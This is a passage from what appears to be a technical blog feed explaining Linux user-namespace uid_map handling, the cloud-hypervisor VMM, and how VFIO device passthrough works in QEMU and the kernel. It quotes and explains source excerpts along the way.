.ns.inum = PROC_USER_INIT_INO,
#ifdef CONFIG_USER_NS
.ns.ops = &userns_operations,
#endif
.flags = USERNS_INIT_FLAGS,
#ifdef CONFIG_PERSISTENT_KEYRINGS
.persistent_keyring_register_sem =
__RWSEM_INITIALIZER(init_user_ns.persistent_keyring_register_sem),
#endif
};
</code></pre></div></div>
<p>As we can see, the uid/gid mapping is the identity mapping, so for processes that don’t use user namespaces it has no effect. Let’s take an example. Say we have a user whose uid is 1000 and whose user namespace is ‘init_user_ns’.</p>
<p><img src="/assets/img/userns/2.png" alt="" /></p>
<p>Then the user creates two user namespaces named ‘us1’ and ‘us2’. ‘us1’ has a ‘0 1000 20’ uid_map and ‘us2’ has a ‘200 1000 20’ uid_map. When we write to the /proc/PID/uid_map file,
‘proc_uid_map_write’ is called and finally ‘map_write’. In this function we can see how the ‘uid_gid_map’ is constructed.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> extent->first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->lower_first = simple_strtoul(pos, &pos, 10);
if (!isspace(*pos))
goto out;
pos = skip_spaces(pos);
extent->count = simple_strtoul(pos, &pos, 10);
if (*pos && !isspace(*pos))
goto out;
</code></pre></div></div>
<p>When userspace reads /proc/PID/uid_map, the seq_file interface is used. When the file is opened, the kernel calls ‘proc_id_map_open’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int proc_id_map_open(struct inode *inode, struct file *file,
const struct seq_operations *seq_ops)
{
struct user_namespace *ns = NULL;
struct task_struct *task;
struct seq_file *seq;
int ret = -EINVAL;
task = get_proc_task(inode);
if (task) {
rcu_read_lock();
ns = get_user_ns(task_cred_xxx(task, user_ns));
rcu_read_unlock();
put_task_struct(task);
}
if (!ns)
goto err;
ret = seq_open(file, seq_ops);
if (ret)
goto err_put_ns;
seq = file->private_data;
seq->private = ns;
return 0;
err_put_ns:
put_user_ns(ns);
err:
return ret;
}
</code></pre></div></div>
<p>Note that ‘seq->private’ stores the user namespace of the process whose /proc/PID/uid_map is being read. Also, ‘seq_open’ sets ‘seq_file->file’ to the opened struct file.</p>
<p>The following is the show routine of /proc/PID/uid_map.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int uid_m_show(struct seq_file *seq, void *v)
{
struct user_namespace *ns = seq->private;
struct uid_gid_extent *extent = v;
struct user_namespace *lower_ns;
uid_t lower;
lower_ns = seq_user_ns(seq);
if ((lower_ns == ns) && lower_ns->parent)
lower_ns = lower_ns->parent;
lower = from_kuid(lower_ns, KUIDT_INIT(extent->lower_first));
seq_printf(seq, "%10u %10u %10u\n",
extent->first,
lower,
extent->count);
return 0;
}
static inline struct user_namespace *seq_user_ns(struct seq_file *seq)
{
#ifdef CONFIG_USER_NS
return seq->file->f_cred->user_ns;
#else
extern struct user_namespace init_user_ns;
return &init_user_ns;
#endif
}
</code></pre></div></div>
<p>Here ‘ns’ is the target process’s user namespace, and ‘lower_ns’ is the opening process’s user namespace. So different opening processes may see different contents in the same /proc/PID/uid_map. We have talked about ‘from_kuid’ above: it returns the ‘kuid’s mapping in the ‘targ’ user_namespace.</p>
<p>Back to our example, now with length 1 for simplicity: us1 has a ‘0 1000 1’ uid_map and us2 has a ‘200 1000 1’ uid_map.</p>
<p>When a process in us1 reads a us2 process’s /proc/PID/uid_map, the ‘lower_ns’ in ‘uid_m_show’ is us1’s user namespace and the ‘extent’ comes from us2’s map, so it shows
‘200 0 1’. Conversely, when a process in us2 reads a us1 process’s /proc/PID/uid_map, it shows ‘0 200 1’.</p>
<p>The following pictures show the two cases.</p>
<p><img src="/assets/img/userns/3.png" alt="" /></p>
<p><img src="/assets/img/userns/4.png" alt="" /></p>
A brief overview of cloud-hypervisor, a modern VMM2019-09-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/09/07/cloud-hypervisor
<h3> Background </h3>
<p>Several months ago, Intel open sourced cloud-hypervisor. Its development is driven by the idea that the modern cloud needs a lighter, more secure, and more efficient VMM. The traditional cloud virtualization solution is qemu plus kvm. In the cloud, we just need an environment to run workloads; there is no need to pay for the legacy devices that qemu emulates. Also, qemu is written in C, which is prone to memory-safety bugs, while Rust is a memory-safe language and a good choice for building a next-generation VMM. Google implemented the first Rust-based light VMM, crosvm, used in Chrome OS. Then AWS developed its own light VMM, Firecracker, which started from the crosvm codebase. After the birth of crosvm and Firecracker, some companies realized there was a lot of duplication between them, and that anyone writing a new Rust-based VMM would have to duplicate that work again. To avoid this, these companies set up the rust-vmm project. rust-vmm factors the common components a Rust-based VMM needs into crates: a kvm wrapper, virtio devices, various utils, and so on. Anyone who wants to implement a Rust-based VMM can use these components, which makes writing one much easier.</p>
<p>Cloud-hypervisor is developed under this background by intel. It uses some code of rust-vmm(vm-memory, kvm_ioctls), firecracker and crosvm. The <a href="https://github.com/intel/cloud-hypervisor">cloud-hypervisor’s page</a> contains the detailed usage info.</p>
<h3> Architecture </h3>
<p>As we know, qemu emulates a whole machine system. Below is a diagram of the i440fx architecture(from qemu sites).</p>
<p><img src="/assets/img/cloud_hypervisor/1.png" alt="" /></p>
<p>As we can see, the topology qemu emulates is nearly the same as a physical machine: an i440FX motherboard, the PCI host bridge, the PCI bus tree, the Super I/O controller and the ISA bus tree.</p>
<p>However, we don’t need such complicated emulation. What cloud workloads mostly need is computing, networking and storage, so cloud-hypervisor has the following architecture.</p>
<p><img src="/assets/img/cloud_hypervisor/2.png" alt="" /></p>
<p>As we can see, cloud-hypervisor’s architecture is very simple. It has no motherboard abstraction at all, just several virtio devices: no ISA bus, no PCI bus tree. The following shows the PCI devices.</p>
<p><img src="/assets/img/cloud_hypervisor/4.png" alt="" /></p>
<h3> Some code </h3>
<p>The following diagram shows the basic function call chains.</p>
<p><img src="/assets/img/cloud_hypervisor/3.png" alt="" /></p>
<p>Some of the notes:</p>
<p>cloud-hypervisor uses several rust-vmm components, such as vm-memory (for memory regions), vm-allocator (for memory space and irq allocation), kvm-bindings (for kvm ioctls), linux-loader (for loading the kernel ELF file), and so on.</p>
<p>Like firecracker, cloud-hypervisor loads the kernel into the VM’s address space and sets the vcpu’s PC to startup_64 (the entry point of vmlinux). cloud-hypervisor also implements a firmware loader.</p>
<p>Memory regions and irq resources are managed with a B-tree.</p>
<p>A legacy device (i8042) is implemented to shut down the VM.</p>
<p>There are also some other interesting things in cloud-hypervisor/rust-vmm/firecracker/crosvm.</p>
<p>Anyway, cloud-hypervisor has a clear architecture; it avoids the complexity of the devices and buses that qemu has to emulate.</p>
qemu VM device passthrough using VFIO, the code analysis2019-08-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/31/vfio-passthrough
<p>QEMU uses VFIO to assign physical devices to VMs. When using vfio, the qemu command line should include the following option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> -device vfio-pci,host=00:12.0,id=net0
</code></pre></div></div>
<p>This adds a vfio-pci device and sets the physical device’s address via the ‘host’ property. As we said in the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis">VFIO driver analysis</a> post, VFIO decomposes the physical device into a set of userspace APIs and recomposes the physical device’s resources. So most of the work in the vfio-pci device’s realize function, ‘vfio_realize’, is to decompose the physical device and connect the physical device’s resources to the virtual machine.</p>
<h3> Bind the device to a domain </h3>
<p>The physical device that will be assigned to the VM has been bound to vfio-pci, and the group node in ‘/dev/vfio/’ has been created. So ‘vfio_realize’ first checks the device and gets the device’s groupid. Then it calls ‘vfio_get_group’. Following is the call chain of this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vfio_get_group
->qemu_open("/dev/vfio/$groupid")
->vfio_connect_container
->qemu_open("/dev/vfio/vfio")
->vfio_init_container
->ioctl(VFIO_GROUP_SET_CONTAINER)
->ioctl(VFIO_SET_IOMMU)
->vfio_kvm_device_add_group
->memory_listener_register
</code></pre></div></div>
<p>‘vfio_get_group’ first opens the group file ‘/dev/vfio/$groupid’. ‘vfio_connect_container’ opens a new container and calls ‘vfio_init_container’ to add this vfio group to the container. After ‘vfio_init_container’, the device is associated with a container and the iommu root table has been set up.</p>
<p>‘vfio_kvm_device_add_group’ bridges the ‘kvm’ and ‘iommu’ subsystems. At the end, ‘vfio_connect_container’ registers a ‘vfio_memory_listener’ to listen for memory layout change events. In the ‘region_add’ callback it calls ‘vfio_dma_map’ to set up the gpa(iova)->hpa mapping. When the guest uses a gpa in DMA programming, the iommu translates this gpa to an hpa and accesses the physical memory directly.</p>
<h3> Populate the device's resources </h3>
<p>After setting up the device’s DMA remapping, ‘vfio_realize’ gets the device’s resources and uses them to reconstruct the vfio-pci device.</p>
<p>First, ‘vfio_get_device’ gets the vfio device’s fd by calling ‘ioctl(VFIO_GROUP_GET_DEVICE_FD)’ with the assigned device’s name. Then it calls ‘ioctl(VFIO_DEVICE_GET_INFO)’ on the device fd to get the basic info of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device_info {
__u32 argsz;
__u32 flags;
#define VFIO_DEVICE_FLAGS_RESET (1 << 0) /* Device supports reset */
#define VFIO_DEVICE_FLAGS_PCI (1 << 1) /* vfio-pci device */
#define VFIO_DEVICE_FLAGS_PLATFORM (1 << 2) /* vfio-platform device */
#define VFIO_DEVICE_FLAGS_AMBA (1 << 3) /* vfio-amba device */
#define VFIO_DEVICE_FLAGS_CCW (1 << 4) /* vfio-ccw device */
#define VFIO_DEVICE_FLAGS_AP (1 << 5) /* vfio-ap device */
__u32 num_regions; /* Max region index + 1 */
__u32 num_irqs; /* Max IRQ index + 1 */
};
</code></pre></div></div>
<p>Returning to ‘vfio_realize’: after ‘vfio_get_device’ it calls ‘vfio_populate_device’ to populate the device’s resources. ‘vfio_populate_device’ gets the info for the 6 BAR regions, 1 PCI config region, and 1 VGA region (if present). ‘vfio_region_setup’ is called to populate each BAR region. Every region is stored in a ‘VFIORegion’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct VFIORegion {
struct VFIODevice *vbasedev;
off_t fd_offset; /* offset of region within device fd */
MemoryRegion *mem; /* slow, read/write access */
size_t size;
uint32_t flags; /* VFIO region flags (rd/wr/mmap) */
uint32_t nr_mmaps;
VFIOMmap *mmaps;
uint8_t nr; /* cache the region number for debug */
} VFIORegion;
</code></pre></div></div>
<p>When we unbind the physical device from its driver and rebind it to the vfio-pci driver, the device’s resources are released. Here ‘fd_offset’ is the offset of the region within the device fd used when doing mmap. ‘mem’ is used by qemu to represent an IO region.</p>
<p>By calling ioctl(VFIO_DEVICE_GET_REGION_INFO) on the device fd we can get the region info; the most important fields are the region’s size, flags, fd_offset, and index.</p>
<p>After getting the io region info, ‘vfio_populate_device’ gets the PCI configuration region.</p>
<p>Later, ‘vfio_realize’ calls ‘vfio_bars_prepare’ and ‘vfio_bars_register’ to mmap the device’s IO regions into userspace. ‘vfio_bars_prepare’ calls ‘vfio_bar_prepare’ for every IO region; ‘vfio_bar_prepare’ gets the region’s properties, such as whether it is an ioport or mmio region and its memory type. ‘vfio_bars_register’ calls ‘vfio_bar_register’ on every IO region. ‘vfio_bar_register’ initializes a MemoryRegion and calls ‘vfio_region_mmap’ to mmap the device IO region into userspace. Finally, ‘vfio_bar_register’ calls ‘pci_register_bar’ to register the BAR for the vfio-pci device. Here we can see that the parameters of ‘pci_register_bar’ come from the physical device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vfio_bar_register(VFIOPCIDevice *vdev, int nr)
{
VFIOBAR *bar = &vdev->bars[nr];
char *name;
if (!bar->size) {
return;
}
bar->mr = g_new0(MemoryRegion, 1);
name = g_strdup_printf("%s base BAR %d", vdev->vbasedev.name, nr);
memory_region_init_io(bar->mr, OBJECT(vdev), NULL, NULL, name, bar->size);
g_free(name);
if (bar->region.size) {
memory_region_add_subregion(bar->mr, 0, bar->region.mem);
if (vfio_region_mmap(&bar->region)) {
error_report("Failed to mmap %s BAR %d. Performance may be slow",
vdev->vbasedev.name, nr);
}
}
pci_register_bar(&vdev->pdev, nr, bar->type, bar->mr);
}
</code></pre></div></div>
<p>Following figure shows the data structure of VFIORegion.</p>
<p><img src="/assets/img/vfio3/1.png" alt="" /></p>
<p>Here we can see that the vfio-pci IO region is actually backed by qemu virtual memory: it is the IO region of the physical device mapped into userspace. For a normal qemu virtual device, an IO region is not backed by virtual memory, so when the guest accesses it, the access traps into qemu via an EPT misconfiguration. For a vfio-pci device, the IO region does have backing virtual memory, so when qemu sets up the EPT mappings, these IO regions are mapped as well. When the guest accesses the vfio-pci device’s IO region, it simply accesses the physical device’s IO region. Remember that the userspace IO region of the vfio-pci device is mmapped from the physical device.</p>
<h3> Config the device </h3>
<p>‘vfio_populate_device’ gets the PCI configuration region’s size and offset within the vfio device fd. In ‘vfio_realize’, after ‘vfio_populate_device’, qemu calls ‘pread’ to read the device’s PCI config region and stores it in ‘vdev->pdev.config’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = pread(vdev->vbasedev.fd, vdev->pdev.config,
MIN(pci_config_size(&vdev->pdev), vdev->config_size),
vdev->config_offset);
</code></pre></div></div>
<p>‘vfio_realize’ then allocates an ‘emulated_config_bits’ space. These bits indicate which parts of the PCI config region are emulated when the guest accesses the vfio pci device’s config space. If a byte (bit) in ‘emulated_config_bits’ is set, ‘vdev->pdev.config’ is used; if it is not set, qemu accesses the physical device’s PCI config region.</p>
<p>‘vfio_realize’ configures the vfio pci device according to the physical device, for example reading ‘PCI_VENDOR_ID’ into ‘vdev->vendor_id’ and ‘PCI_DEVICE_ID’ into ‘vdev->device_id’. ‘vfio_pci_size_rom’, ‘vfio_msix_early_setup’ and ‘vfio_add_capabilities’ also just operate on the PCI configuration region.</p>
<p>Then ‘vfio_realize’ sets up the device’s interrupt handling.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1)) {
vdev->intx.mmap_timer = timer_new_ms(QEMU_CLOCK_VIRTUAL,
vfio_intx_mmap_enable, vdev);
pci_device_set_intx_routing_notifier(&vdev->pdev, vfio_intx_update);
ret = vfio_intx_enable(vdev, errp);
if (ret) {
goto out_teardown;
}
}
</code></pre></div></div>
<p>Here ‘pci_device_set_intx_routing_notifier’ is called to register an ‘intx_routing_notifier’. We need this because the guest’s host bridge may change the assigned device’s INTx-to-irq mapping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_intx_enable(VFIOPCIDevice *vdev, Error **errp)
{
uint8_t pin = vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1);
Error *err = NULL;
int32_t fd;
int ret;
if (!pin) {
return 0;
}
vfio_disable_interrupts(vdev);
vdev->intx.pin = pin - 1; /* Pin A (1) -> irq[0] */
pci_config_set_interrupt_pin(vdev->pdev.config, pin);
#ifdef CONFIG_KVM
/*
* Only conditional to avoid generating error messages on platforms
* where we won't actually use the result anyway.
*/
if (kvm_irqfds_enabled() && kvm_resamplefds_enabled()) {
vdev->intx.route = pci_device_route_intx_to_irq(&vdev->pdev,
vdev->intx.pin);
}
#endif
ret = event_notifier_init(&vdev->intx.interrupt, 0);
if (ret) {
error_setg_errno(errp, -ret, "event_notifier_init failed");
return ret;
}
fd = event_notifier_get_fd(&vdev->intx.interrupt);
qemu_set_fd_handler(fd, vfio_intx_interrupt, NULL, vdev);
if (vfio_set_irq_signaling(&vdev->vbasedev, VFIO_PCI_INTX_IRQ_INDEX, 0,
VFIO_IRQ_SET_ACTION_TRIGGER, fd, &err)) {
error_propagate(errp, err);
qemu_set_fd_handler(fd, NULL, NULL, vdev);
event_notifier_cleanup(&vdev->intx.interrupt);
return -errno;
}
vfio_intx_enable_kvm(vdev, &err);
if (err) {
warn_reportf_err(err, VFIO_MSG_PREFIX, vdev->vbasedev.name);
}
vdev->interrupt = VFIO_INT_INTx;
trace_vfio_intx_enable(vdev->vbasedev.name);
return 0;
}
</code></pre></div></div>
<p>‘vfio_intx_enable’ sets up the vfio pci device’s interrupt. This function initializes an EventNotifier, ‘vdev->intx.interrupt’, whose read handler is ‘vfio_intx_interrupt’. Then ‘vfio_intx_enable’ calls ‘vfio_set_irq_signaling’ to set the fd as the interrupt eventfd. When the host device receives an interrupt, it signals this eventfd, and the fd’s handler ‘vfio_intx_interrupt’ handles the interrupt. This is the common path, but it is not efficient, so ‘vfio_intx_enable_kvm’ is called.</p>
<p>kvm has a mechanism called irqfd: qemu can call ioctl(KVM_IRQFD) with a ‘kvm_irqfd’ argument to connect an irq to a fd.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kvm_irqfd irqfd = {
.fd = event_notifier_get_fd(&vdev->intx.interrupt),
.gsi = vdev->intx.route.irq,
.flags = KVM_IRQFD_FLAG_RESAMPLE,
};
</code></pre></div></div>
<p>When the ‘fd’ is signaled, the kvm subsystem injects the ‘gsi’ interrupt into the VM. irqfd bypasses userspace qemu and injects the interrupt directly in the kernel.</p>
<p>‘vfio_intx_enable_kvm’ sets up the interrupt fd’s irqfd. Notice that there is also a resample fd. The vfio device interrupt handler in the kernel disables the interrupt; when the guest completes the interrupt dispatch, it triggers an EOI, and vfio then signals an event on the resample fd and re-enables the interrupt.</p>
<p>After doing some quirk work, ‘vfio_realize’ calls ‘vfio_register_err_notifier’ and ‘vfio_register_req_notifier’ to register two EventNotifiers. The error EventNotifier is signaled when the physical device detects an unrecoverable error; the req EventNotifier is signaled to request unplugging the vfio pci device.</p>
VFIO driver analysis2019-08-21T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis
<p>The VFIO driver is a framework for exposing direct device access to userspace. Virtual machine technology uses VFIO to assign physical devices to VMs for the highest possible IO performance. In this post, I will focus on the VFIO driver itself.</p>
<p>VFIO’s basic idea is shown in the following figure, which is from Alex Williamson’s talk <a href="http://www.linux-kvm.org/images/5/54/01x04-Alex_Williamson-An_Introduction_to_PCI_Device_Assignment_with_VFIO.pdf">An Introduction to PCI Device Assignment with VFIO</a>.</p>
<p><img src="/assets/img/vfio2/1.png" alt="" /></p>
<p>VFIO decomposes the physical device into a set of userspace APIs and recomposes the physical device’s resources into a virtual device in qemu.</p>
<p>There are three concepts in VFIO: Groups, Devices, and Containers.</p>
<p>Devices expose a programming interface made up of IO access, interrupts, and DMA. Userspace (qemu) can use this interface to get the device’s information and configure the device.</p>
<p>A group is a set of devices which is isolatable from all other devices in the system. A group is the minimum granularity that can be assigned to a VM.</p>
<p>A container holds a set of groups. Different groups can be placed in the same container.</p>
<p>Following figure shows the relation of container, group and device.</p>
<p><img src="/assets/img/vfio2/2.png" alt="" /></p>
<p>Following figure shows the architecture of VFIO PCI.</p>
<p><img src="/assets/img/vfio2/3.png" alt="" /></p>
<h3> Bind device to vfio-pci driver </h3>
<p>In the ‘<a href="https://terenceli.github.io/技术/2019/08/16/vfio-usage">VFIO usage</a>’ post, we learned that before assigning a device to a VM, we need to unbind its original driver and bind it to the vfio-pci driver first.</p>
<p>The vfio-pci driver just registers ‘vfio_pci_driver’ in its ‘vfio_pci_init’ function. When the assigned device is bound, the driver’s ‘probe’ callback, ‘vfio_pci_probe’, is called.</p>
<p>‘vfio_pci_probe’ first allocates and initializes a ‘vfio_pci_device’ struct, then calls ‘vfio_add_group_dev’ to create a ‘vfio_device’ and add it to a ‘vfio_group’. If the ‘vfio_group’ does not exist yet, ‘vfio_add_group_dev’ also creates it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfio_add_group_dev(struct device *dev,
const struct vfio_device_ops *ops, void *device_data)
{
struct iommu_group *iommu_group;
struct vfio_group *group;
struct vfio_device *device;
iommu_group = iommu_group_get(dev);
if (!iommu_group)
return -EINVAL;
group = vfio_group_get_from_iommu(iommu_group);
if (!group) {
group = vfio_create_group(iommu_group);
if (IS_ERR(group)) {
iommu_group_put(iommu_group);
return PTR_ERR(group);
}
} else {
/*
* A found vfio_group already holds a reference to the
* iommu_group. A created vfio_group keeps the reference.
*/
iommu_group_put(iommu_group);
}
device = vfio_group_get_device(group, dev);
if (device) {
WARN(1, "Device %s already exists on group %d\n",
dev_name(dev), iommu_group_id(iommu_group));
vfio_device_put(device);
vfio_group_put(group);
return -EBUSY;
}
device = vfio_group_create_device(group, dev, ops, device_data);
if (IS_ERR(device)) {
vfio_group_put(group);
return PTR_ERR(device);
}
/*
* Drop all but the vfio_device reference. The vfio_device holds
* a reference to the vfio_group, which holds a reference to the
* iommu_group.
*/
vfio_group_put(group);
return 0;
}
</code></pre></div></div>
<p>‘vfio_group’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_group {
struct kref kref;
int minor;
atomic_t container_users;
struct iommu_group *iommu_group;
struct vfio_container *container;
struct list_head device_list;
struct mutex device_lock;
struct device *dev;
struct notifier_block nb;
struct list_head vfio_next;
struct list_head container_next;
struct list_head unbound_list;
struct mutex unbound_lock;
atomic_t opened;
};
</code></pre></div></div>
<p>‘vfio_create_group’ creates and initializes a ‘vfio_group’. It also creates a device file in the ‘/dev/vfio/’ directory; this is the group file, and its file_ops is ‘vfio_group_fops’. The ‘vfio_group’s ‘dev’ field is for this device. The ‘container’ field points to the container to which this group is attached. ‘device_list’ links the vfio devices. ‘iommu_group’ points to the low-level iommu group, which was created for the device when the IOMMU was set up; ‘vfio_group’ is like a bridge between the vfio interface and the low-level iommu. Once a ‘vfio_group’ is created, it is linked into the global variable ‘vfio’s ‘group_list’.</p>
<p>In ‘vfio_add_group_dev’, after getting or creating a ‘vfio_group’, the driver creates a ‘vfio_device’ and adds it to the ‘vfio_group’. This is done by ‘vfio_group_create_device’. ‘vfio_device’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device {
struct kref kref;
struct device *dev;
const struct vfio_device_ops *ops;
struct vfio_group *group;
struct list_head group_next;
void *device_data;
};
</code></pre></div></div>
<p>Here ‘dev’ is the physical device. ‘ops’ is ‘vfio_pci_ops’; ‘group’ is the group just obtained or created; ‘group_next’ links this ‘vfio_device’ into the ‘vfio_group’s ‘device_list’. ‘device_data’ is set to the ‘vfio_pci_device’ created in ‘vfio_pci_probe’.</p>
<p>When userspace triggers ioctl(VFIO_GROUP_GET_DEVICE_FD) on the group’s fd, the handler ‘vfio_group_get_device_fd’ allocates a ‘file’ and an fd with the ‘vfio_device’ as the private data. This fd’s file_ops is ‘vfio_device_fops’, whose callbacks mostly delegate to the corresponding ‘vfio_pci_ops’ functions.</p>
<p>Following figure shows some of the data structure’s relation.</p>
<p><img src="/assets/img/vfio2/4.png" alt="" /></p>
<h3> VFIO kernel module initialization </h3>
<p>The VFIO driver creates the ‘/dev/vfio/vfio’ device and manages the whole system’s VFIO state. It defines a ‘vfio’ global variable to store the vfio iommu drivers and iommu groups.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct vfio {
struct class *class;
struct list_head iommu_drivers_list;
struct mutex iommu_drivers_lock;
struct list_head group_list;
struct idr group_idr;
struct mutex group_lock;
struct cdev group_cdev;
dev_t group_devt;
wait_queue_head_t release_q;
} vfio;
</code></pre></div></div>
<p>All vfio iommu drivers are linked in ‘iommu_drivers_list’. All vfio groups are linked in ‘group_list’.</p>
<p>In ‘vfio_init’, the driver initializes this ‘vfio’ struct and registers a misc device named ‘vfio_dev’. It creates a ‘vfio’ device class and allocates the device numbers for the group nodes ‘/dev/vfio/$group_id’.</p>
<p>‘/dev/vfio/vfio’s file_ops is ‘vfio_fops’, and its ‘open’ callback is ‘vfio_fops_open’. We can see that a ‘vfio_container’ is stored in the fd’s ‘private_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_fops_open(struct inode *inode, struct file *filep)
{
struct vfio_container *container;
container = kzalloc(sizeof(*container), GFP_KERNEL);
if (!container)
return -ENOMEM;
INIT_LIST_HEAD(&container->group_list);
init_rwsem(&container->group_lock);
kref_init(&container->kref);
filep->private_data = container;
return 0;
}
</code></pre></div></div>
<h3> Attach the group to a container and allocate the IOMMU </h3>
<p>We now have a container fd (by opening the ‘/dev/vfio/vfio’ device) and a group fd (by opening ‘/dev/vfio/$gid’). We need to attach the group to the container; this is done by calling ioctl(VFIO_GROUP_SET_CONTAINER) on the group fd. The handler for this ioctl is ‘vfio_group_set_container’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_group_set_container(struct vfio_group *group, int container_fd)
{
struct fd f;
struct vfio_container *container;
struct vfio_iommu_driver *driver;
int ret = 0;
...
f = fdget(container_fd);
...
container = f.file->private_data;
WARN_ON(!container); /* fget ensures we don't race vfio_release */
down_write(&container->group_lock);
driver = container->iommu_driver;
if (driver) {
ret = driver->ops->attach_group(container->iommu_data,
group->iommu_group);
if (ret)
goto unlock_out;
}
group->container = container;
list_add(&group->container_next, &container->group_list);
/* Get a reference on the container and mark a user within the group */
vfio_container_get(container);
atomic_inc(&group->container_users);
unlock_out:
up_write(&container->group_lock);
fdput(f);
return ret;
}
</code></pre></div></div>
<p>The most important work here is adding the group to the container’s ‘group_list’. Also, if the container has already been set up with an iommu driver, ‘vfio_group_set_container’ attaches this group to that iommu driver.</p>
<p>Userspace can set the container’s iommu by calling ioctl(VFIO_SET_IOMMU) on the container fd. The handler for this ioctl is ‘vfio_ioctl_set_iommu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long vfio_ioctl_set_iommu(struct vfio_container *container,
unsigned long arg)
{
struct vfio_iommu_driver *driver;
long ret = -ENODEV;
down_write(&container->group_lock);
/*
* The container is designed to be an unprivileged interface while
* the group can be assigned to specific users. Therefore, only by
* adding a group to a container does the user get the privilege of
* enabling the iommu, which may allocate finite resources. There
* is no unset_iommu, but by removing all the groups from a container,
* the container is deprivileged and returns to an unset state.
*/
if (list_empty(&container->group_list) || container->iommu_driver) {
up_write(&container->group_lock);
return -EINVAL;
}
mutex_lock(&vfio.iommu_drivers_lock);
list_for_each_entry(driver, &vfio.iommu_drivers_list, vfio_next) {
void *data;
if (!try_module_get(driver->ops->owner))
continue;
/*
* The arg magic for SET_IOMMU is the same as CHECK_EXTENSION,
* so test which iommu driver reported support for this
* extension and call open on them. We also pass them the
* magic, allowing a single driver to support multiple
* interfaces if they'd like.
*/
if (driver->ops->ioctl(NULL, VFIO_CHECK_EXTENSION, arg) <= 0) {
module_put(driver->ops->owner);
continue;
}
/* module reference holds the driver we're working on */
mutex_unlock(&vfio.iommu_drivers_lock);
data = driver->ops->open(arg);
if (IS_ERR(data)) {
ret = PTR_ERR(data);
module_put(driver->ops->owner);
goto skip_drivers_unlock;
}
ret = __vfio_container_attach_groups(container, driver, data);
if (!ret) {
container->iommu_driver = driver;
container->iommu_data = data;
} else {
driver->ops->release(data);
module_put(driver->ops->owner);
}
goto skip_drivers_unlock;
}
mutex_unlock(&vfio.iommu_drivers_lock);
skip_drivers_unlock:
up_write(&container->group_lock);
return ret;
}
</code></pre></div></div>
<p>The vfio iommu drivers supported by the system are registered in ‘vfio.iommu_drivers_list’. A vfio iommu driver is the layer between vfio and the iommu hardware. We will take version 2 of the type1 vfio iommu as an example. ‘vfio_ioctl_set_iommu’ first calls the ‘open’ callback of the vfio iommu driver and gets driver-specific data. It then passes this data to ‘__vfio_container_attach_groups’, which iterates over the groups in this container and calls the ‘attach_group’ callback of the vfio iommu driver.</p>
<p>‘vfio_iommu_driver_ops_type1’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct vfio_iommu_driver_ops vfio_iommu_driver_ops_type1 = {
.name = "vfio-iommu-type1",
.owner = THIS_MODULE,
.open = vfio_iommu_type1_open,
.release = vfio_iommu_type1_release,
.ioctl = vfio_iommu_type1_ioctl,
.attach_group = vfio_iommu_type1_attach_group,
.detach_group = vfio_iommu_type1_detach_group,
};
</code></pre></div></div>
<p>‘vfio_iommu_type1_open’ allocates and initializes a ‘vfio_iommu’ struct and returns it. ‘vfio_iommu’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu {
struct list_head domain_list;
struct mutex lock;
struct rb_root dma_list;
bool v2;
bool nesting;
};
</code></pre></div></div>
<p>‘domain_list’ links the ‘vfio_domain’s attached to the container. ‘dma_list’ is a red-black tree recording the IOVA mappings.</p>
<p>‘vfio_iommu_type1_attach_group’ is used to attach an iommu_group to the vfio iommu. It allocates a new ‘vfio_group’ and ‘vfio_domain’. A ‘vfio_domain’ has an ‘iommu_domain’ which stores the hardware iommu information. The function then calls ‘iommu_attach_group’ to attach the iommu group to the iommu domain, which finally calls ‘intel_iommu_attach_device’. Through ‘domain_add_dev_info’->‘dmar_insert_one_dev_info’->‘domain_context_mapping’…->‘domain_context_mapping_one’, the device’s info is written to the context table.
Notice that in ‘vfio_iommu_type1_attach_group’, if two vfio_domains have the same iommu properties, different groups are attached to the same ‘vfio_domain’.</p>
<p>Following figure shows some of the data structure’s relation.</p>
<p><img src="/assets/img/vfio2/5.png" alt="" /></p>
<h3> IOVA map </h3>
